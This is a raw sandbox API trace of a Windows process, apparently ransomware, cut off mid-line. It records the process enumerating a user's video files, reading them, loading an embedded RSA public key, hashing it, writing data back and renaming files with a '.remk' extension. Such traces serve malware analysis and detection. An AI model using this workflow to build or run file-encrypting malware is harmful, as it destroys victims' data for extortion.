[0236.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.816] GetCurrentThreadId () returned 0x314 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x3192918 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc918 [0236.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8b8 [0236.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8d0 [0236.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8a0 [0236.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc930 [0236.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc900 [0236.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8e8 [0236.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc948 [0236.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8e8 | out: hHeap=0x630000) returned 1 [0236.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc8e8 [0236.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc900 | out: hHeap=0x630000) returned 1 [0236.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0236.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8b8 | out: hHeap=0x630000) returned 1 [0236.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8b8 [0236.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc918 | out: hHeap=0x630000) returned 1 [0236.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0236.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc948 | out: hHeap=0x630000) returned 1 [0236.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0236.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8b8 | out: hHeap=0x630000) returned 1 [0236.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0236.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694f48 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8e8 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc930 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8d0 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8a0 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc888 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cef88 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0236.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0236.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0236.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.820] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0xab05, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0xab05, lpOverlapped=0x0) returned 1 [0236.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0236.820] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xab0a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.820] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0236.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0236.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0236.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0236.821] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0236.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.821] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.821] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.821] CloseHandle (hObject=0x640) returned 1 [0236.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3186340 [0236.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0236.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3186340 | out: hHeap=0x630000) returned 1 [0236.831] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\GodaZbgKBQyE.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\godazbgkbqye.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\GodaZbgKBQyE.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\godazbgkbqye.flv.remk")) returned 1 [0236.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.832] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0236.833] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9544ec50, ftCreationTime.dwHighDateTime=0x1d5dbea, ftLastAccessTime.dwLowDateTime=0xbafa3d0, ftLastAccessTime.dwHighDateTime=0x1d5e47e, ftLastWriteTime.dwLowDateTime=0xbafa3d0, ftLastWriteTime.dwHighDateTime=0x1d5e47e, nFileSizeHigh=0x0, nFileSizeLow=0x6a2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LJecWOah9kPE.mp4", cAlternateFileName="LJECWO~1.MP4")) returned 1 [0236.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e990 [0236.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0236.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e990 | out: hHeap=0x630000) returned 1 [0236.835] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\LJecWOah9kPE.mp4") returned=".mp4" [0236.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\LJecWOah9kPE.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\ljecwoah9kpe.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.835] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=27183) returned 1 [0236.835] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.838] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x6a09, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.838] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.840] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.840] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x6a2f, lpOverlapped=0x0) returned 1 [0236.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.842] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694f48) returned 1 [0236.842] CryptCreateHash (in: hProv=0x694f48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.843] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.843] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.843] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.843] GetLastError () returned 0x0 [0236.843] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.843] CryptReleaseContext (hProv=0x694f48, dwFlags=0x0) returned 1 [0236.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.843] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.843] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.843] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x6a30) returned 0x37cf820 [0236.844] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cef88 [0236.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc888 [0236.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cefd0 [0236.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8a0 [0236.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8d0 [0236.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc930 [0236.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8e8 [0236.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.845] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8d0 | out: hHeap=0x630000) returned 1 [0236.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8e8 | out: hHeap=0x630000) returned 1 [0236.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc930 | out: hHeap=0x630000) returned 1 [0236.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc930 [0236.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc8e8 [0236.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0236.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc8d0 [0236.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0236.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8e8 | out: hHeap=0x630000) returned 1 [0236.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.846] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x6a2f, 